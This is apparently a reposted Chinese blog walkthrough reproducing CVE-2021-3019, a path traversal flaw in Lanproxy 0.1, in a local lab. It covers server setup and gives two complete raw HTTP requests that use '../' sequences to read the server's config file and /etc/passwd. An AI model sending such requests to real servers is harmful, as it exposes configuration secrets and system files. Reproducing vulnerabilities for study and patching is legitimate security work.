Lanproxy任意文件读取漏洞复现(CVE-2021-3019)
2021/5/2 10:26:55
本文主要是介绍Lanproxy任意文件读取漏洞复现(CVE-2021-3019),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
声明
好好学习,天天向上
漏洞描述
影响范围
复现过程
这里使用0.1版本
下载地址,复现只下载服务端版本即可,放在一个已经配置好java环境的linux的服务器中,proxy-server-0.1.zip
https://file.nioee.com/d/2e81550ebdbd416c933f/
执行
unzip proxy-server-0.1.zip mv proxy-server-0.1 /usr/local/ vim /usr/local/proxy-server-0.1/conf/config.properties
看到了配置文件,不做修改
启动服务
cd /usr/local/proxy-server-0.1/bin chmod +x startup.sh ./startup.sh
环境启动后,访问
http://192.168.31.64:8090/
BP抓包,修改为如下,可以看到刚刚的那个配置文件
GET /../conf/config.properties HTTP/1.1 Host: 192.168.31.64:8090 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
查看passwd,如果第二次半天出不来,可重新抓个包修改
GET /../../../../../../etc/passwd HTTP/1.1 Host: 192.168.31.64:8090 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
这篇关于Lanproxy任意文件读取漏洞复现(CVE-2021-3019)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-15PingCAP 黄东旭参与 CCF 秀湖会议,共探开源教育未来
- 2024-05-13PingCAP 戴涛:构建面向未来的金融核心系统
- 2024-05-09flutter3.x_macos桌面os实战
- 2024-05-09Rust中的并发性:Sync 和 Send Traits
- 2024-05-08使用Ollama和OpenWebUI在CPU上玩转Meta Llama3-8B
- 2024-05-08完工标准(DoD)与验收条件(AC)究竟有什么不同?
- 2024-05-084万 star 的 NocoDB 在 sealos 上一键起,轻松把数据库编程智能表格
- 2024-05-08Mac 版Stable Diffusion WebUI的安装
- 2024-05-08解锁CodeGeeX智能问答中3项独有的隐藏技能
- 2024-05-08RAG算法优化+新增代码仓库支持,CodeGeeX的@repo功能效果提升